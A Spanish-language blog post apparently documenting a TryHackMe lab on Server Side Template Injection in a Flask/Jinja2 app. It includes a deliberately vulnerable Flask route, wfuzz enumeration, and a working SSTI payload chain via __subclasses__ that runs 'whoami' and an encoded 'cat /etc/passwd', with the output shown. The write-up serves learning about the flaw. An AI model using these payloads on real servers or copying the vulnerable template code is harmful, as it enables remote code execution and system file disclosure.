<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

  <title>SSTI Writeup</title>
  <meta property="og:title" content="SSTI Writeup" />
  <meta name="twitter:title" content="SSTI Writeup" />
  <meta name="description" content="Explotando STTI en Tryhackme">
  <meta property="og:description" content="Explotando STTI en Tryhackme">
  <meta name="twitter:description" content="Explotando STTI en Tryhackme">
  <meta name="author" content="Ps-axu"/>
  <link href='https://ps-axu.com/img/50-50.de.svg' rel='icon' type='image/x-icon'/>
  <meta property="og:image" content="https://ps-axu.com/img/avatar-favicon3-De.png" />
  <meta name="twitter:image" content="https://ps-axu.com/img/avatar-favicon3-De.png" />
  <meta name="twitter:card" content="summary" />
  <meta property="og:url" content="https://ps-axu.com/post/2021-04-15-ssti-writeup/" />
  <meta property="og:type" content="website" />
  <meta property="og:site_name" content="ps-axu" />

  <meta name="generator" content="Hugo 0.54.0" />
  <link rel="canonical" href="https://ps-axu.com/post/2021-04-15-ssti-writeup/" />
  <link rel="alternate" href="https://ps-axu.com/index.xml" type="application/rss+xml" title="ps-axu">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/katex.min.css" integrity="sha384-wITovz90syo1dJWVh32uuETPVEtGigN07tkttEqPv+uR2SE/mbQcG7ATL28aI9H0" crossorigin="anonymous">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" crossorigin="anonymous">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
  <link rel="stylesheet" href="https://ps-axu.com/css/main.css" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" />
  <link rel="stylesheet" href="https://ps-axu.com/css/pygment_highlights.css" />
  <link rel="stylesheet" href="https://ps-axu.com/css/highlight.min.css" />

</head>

  <body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://ps-axu.com/">ps-axu</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
        
          
            <li>
              <a title="Blog" href="https://ps-axu.com/">Blog</a>
            </li>
          
        
          
            <li>
              <a title="Tags" href="https://ps-axu.com/tags">Tags</a>
            </li>
          
        

        

        
      </ul>
    </div>

    <div class="avatar-container">
      <div class="avatar-img-border">
        
          <a title="ps-axu" href="https://ps-axu.com/">
            <img class="avatar-img" src="https://ps-axu.com/img/avatar-favicon3-De.png" alt="ps-axu" />
          </a>
        
      </div>
    </div>

  </div>
</nav>




    
  
  
  




  

  <header class="header-section ">
    
    <div class="intro-header no-img">
      
      <div class="container">
        <div class="row">
          <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
            <div class="post-heading">
              <h1>SSTI Writeup</h1>
                
                  
                    <h2 class="post-subheading">Explotando STTI en Tryhackme</h2>
                  
                
                
                  <span class="post-meta">
  Posted on April 15, 2021
  
</span>


                
            </div>
          </div>
        </div>
      </div>
    </div>
  </header>


    
<div class="container">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
        

<blockquote>
<p>Maquina orientada a aprender a explotar la vulneravilidad SSTI.(Server Side Template Injection)</p>
</blockquote>

<h2 id="what-is-server-side-template-injection">What Is Server Side Template Injection</h2>

<p>Es un ataque de inyección de código por parte del servidor por un fallo en la programación del codigo a la hora de generar los templates.</p>

<h2 id="que-es-un-template-engine">Que es un Template Engine</h2>

<p>El template engine se encarga de generar el contenido estatico usando flask una librería de python.</p>

<p>En ejemplo sencillo se podría ver tal que así:</p>

<pre><code class="language-python">
import flask

app = Flask(__name__)


@app.route(&quot;/profile/&lt;user&gt;&quot;)

def profile_page(user):
        template = f&quot;&lt;h1&gt;Welcome to the profile of {user}!&lt;/hi1&gt;&quot;
        
        return render_template_string(template)
    
app.run()

</code></pre>

<h2 id="como-se-explota-esta-vulneravilidad">¿Como se explota esta vulneravilidad?</h2>

<p>Teniendo en cuenta el código anterior especiálmente la cadena <strong>template</strong>, la variable <strong>user</strong> es concatenada direcatemente en el template en vez de ser pasada como datos. Esto significa que cualquier texto introducido por el usuario va a ser interpretado por el backend.</p>

<h2 id="enumerando">Enumerando</h2>

<p>Hacemos un escaneo a la máquina con <code>nmap</code> y vemos que tiene el puerto 5000 y el 22.</p>

<p>Nos vamos al puerto 5000 desde el navegador y vemos que está corriendo un servicio web, aunque en tryhackme nos dice donde está la direccion vulnerablle vamos a fuzzear para ver si nos lo saca.</p>

<pre><code>wfuzz -c -t 300 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt --ip 10.10.101.150:5000 -u http://10.10.101.150/FUZZ
</code></pre>

<p>Nos vamos a <code>/profile/user</code></p>

<p>Y nos devuelve el contenido dependiendo del la variable que pongamos despues de <code>profile/</code></p>

<p><img src="../../img/web-1.png" alt="image alt" /></p>

<p>Fuzeamos con diferentes peticiones para saber por donde se empiezan a fallar las cosas.</p>

<p>Al introducir: <code>/profile/{{</code> vemos que falla:</p>

<pre><code>Internal Server Error

The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
</code></pre>

<p>Esto ya nos dice que puede ser vulnerable.</p>

<p>La siguiente fase es descubrir cual es el backend que hay por detrás.</p>

<p>Para ello podemos utilizar de referencia la imagen que nos comparten en Tryhackme.</p>

<p><img src="../../img/web-ref.png" alt="image alt" /></p>

<p>Probamos con <code>http://10.10.101.150:5000/profile/${7*7}</code>, pero no nos devuelve nada interesante.</p>

<p>Sinembargo con <code>http://10.10.101.150:5000/profile/{{7*7}}</code> hay sorpresa!</p>

<pre><code>Welcome to the profile of 49!
</code></pre>

<p>Hacemos una comprobación más para saber si es realmente vulnerable. Si hace la multiplicación de las cadenas significa que nuestro objetivo si es vulnerable a SSTI.</p>

<p>Payload: <code>http://10.10.101.150:5000/profile/{{7*'7'}}</code></p>

<pre><code>Welcome to the profile of 7777777!
</code></pre>

<h2 id="preparando-el-ssti">Preparando el SSTI</h2>

<p>Una forma sencilla de poder hacer el RCE sería haciendo <code>{% import os %}{{ os.system(&quot;whoami&quot;) }}</code> pero por desgracia Jinja2 no contiene la declaración import.</p>

<p>Pero podemos acceder al la clase actual con <code>.__class__</code> el cual nos delvolverá la clase completa.</p>

<p>Las clases en Python tienen un atributo llamado <code>.__mro__</code> que permite escalar hacia arriba en un objeto.</p>

<pre><code>{{ ''.__class__.__mro__ }}.
</code></pre>

<p>Output:</p>

<pre><code>Welcome to the profile of (&lt;class 'str'&gt;, &lt;class 'object'&gt;).!
</code></pre>

<p>Como buscamos el objeto raíz podemos acceder al el mediante el <strong>index 1 de mro</strong>.</p>

<pre><code>{{ ''.__class__.__mro__[1] }}
</code></pre>

<p>Los objetos en python tienen un metodo llamado .<strong>subclases</strong> que permite desdender en el arbol de objetos.</p>

<pre><code>{{ ''.__class__.__mro__[1].__subclasses__() }}
</code></pre>

<p>Esto nos devuelve todas los objetos que tiene la raíz. Ahora tendremos que buscar objetos que nos permitan ejecutar comandos, como <strong>system</strong>, <strong>subprocess</strong> &hellip; Para acceder al este objeto tenemos que acceder directamente por el indice, así que primero tenemos que encontrar donde está.</p>

<p>Una forma sencilla para ir descartando seria ir accediendo a los indices <code>[40:]</code> para que nos muestre del 40 en adelante y luego ir sumando para ir descartando los que no nos sirvan.</p>

<pre><code>{{ ''.__class__.__mro__[1].__subclasses__()[401] }}
</code></pre>

<p>Una vez encontrado el objeto intentamos lanzar comando para ver que nos devuelve:</p>

<pre><code>{{ ''.__class__.__mro__[1].__subclasses__()[401](&quot;whoami&quot;, shell=True, stdout=-1).communicate() }}
</code></pre>

<p>Output:</p>

<pre><code>Welcome to the profile of (b'jake\n', None)!
</code></pre>

<p>Ya sabemos que somos <strong>Jake</strong>, ahora vamos a probar si hay más usuarios interesantes.</p>

<pre><code>{{ ''.__class__.__mro__[1].__subclasses__()[401](&quot;cat /etc/passwd&quot;, shell=True, stdout=-1).communicate() }}
</code></pre>

<p>Not found, parece ser que los espacios o las <code>/</code> no les gusta. Vamos a probar a encodear nuesto payload con Cybercheff.</p>

<p><img src="../../img/cheff-1.png" alt="image alt" /></p>

<p>Pyaload encodeado:</p>

<pre><code>{{ ''.__class__.__mro__[1].__subclasses__()[401]('%5Cx63%5Cx61%5Cx74%5Cx20%5Cx2f%5Cx65%5Cx74%5Cx63%5Cx2f%5Cx70%5Cx61%5Cx73%5Cx73%5Cx77%5Cx64', shell=True, stdout=-1).communicate() }}
</code></pre>

<p>Output:</p>

<pre><code>Welcome to the profile of (b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nsshd:x:110:65534::/run/sshd:/usr/sbin/nologin\njake:x:1000:1000:Jake:/home/jake:/bin/bash\n', None)!
</code></pre>

<h2 id="reffs">Reffs</h2>

<ul>
<li><a href="https://wfuzz.readthedocs.io/en/latest/user/advanced.html">https://wfuzz.readthedocs.io/en/latest/user/advanced.html</a></li>
</ul>

      </article>

      <ul class="pager blog-pager">
        
          <li class="previous">
            <a href="https://ps-axu.com/post/2021-03-27-kenobi-writeup/" data-toggle="tooltip" data-placement="top" title="Kenobi Writeup">&larr; Previous Post</a>
          </li>
        
        
          <li class="next">
            <a href="https://ps-axu.com/post/2021-04-15-opnsense-firewall/" data-toggle="tooltip" data-placement="top" title="Opnsense-Firewall">Next Post &rarr;</a>
          </li>
        
      </ul>

      
        
      

    </div>
  </div>
</div>

    <footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
              <li>
                <a href="mailto:youremail@domain.com" title="Email me">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fas fa-envelope fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://gitlab.com/ps-axu" title="GitLab">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fab fa-gitlab fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://linkedin.com/in/Che-r" title="LinkedIn">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fab fa-linkedin fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
          
          <li>
            <a href="https://ps-axu.com/index.xml" title="RSS">
              <span class="fa-stack fa-lg">
                <i class="fa fa-circle fa-stack-2x"></i>
                <i class="fa fa-rss fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          
        </ul>
        <p class="credits copyright text-muted">
          Ps-axu
          &nbsp;&bull;&nbsp;
          2021

          
            &nbsp;&bull;&nbsp;
            <a href="https://ps-axu.com/">ps-axu</a>
          
        </p>
        
        <p class="credits theme-by text-muted">
          <a href="http://gohugo.io">Hugo v0.54.0</a> powered &nbsp;&bull;&nbsp; Theme by <a href="http://deanattali.com/beautiful-jekyll/">Beautiful Jekyll</a> adapted to <a href="https://github.com/halogenica/beautifulhugo">Beautiful Hugo</a>
          
        </p>
      </div>
    </div>
  </div>
</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/katex.min.js" integrity="sha384-/y1Nn9+QQAipbNQWU65krzJralCnuOasHncUFXGkdwntGeSvQicrYkiUBwsgUqc1" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/contrib/auto-render.min.js" integrity="sha384-dq1/gEHSxPZQ7DdrM82ID4YVol9BYyU7GbWlIwnwyPzotpoc57wDw/guX8EaYGPx" crossorigin="anonymous"></script>
<script src="https://code.jquery.com/jquery-1.12.4.min.js" integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://ps-axu.com/js/main.js"></script>
<script src="https://ps-axu.com/js/highlight.min.js"></script>
<script> hljs.initHighlightingOnLoad(); </script>
<script> renderMathInElement(document.body); </script>





  </body>
</html>

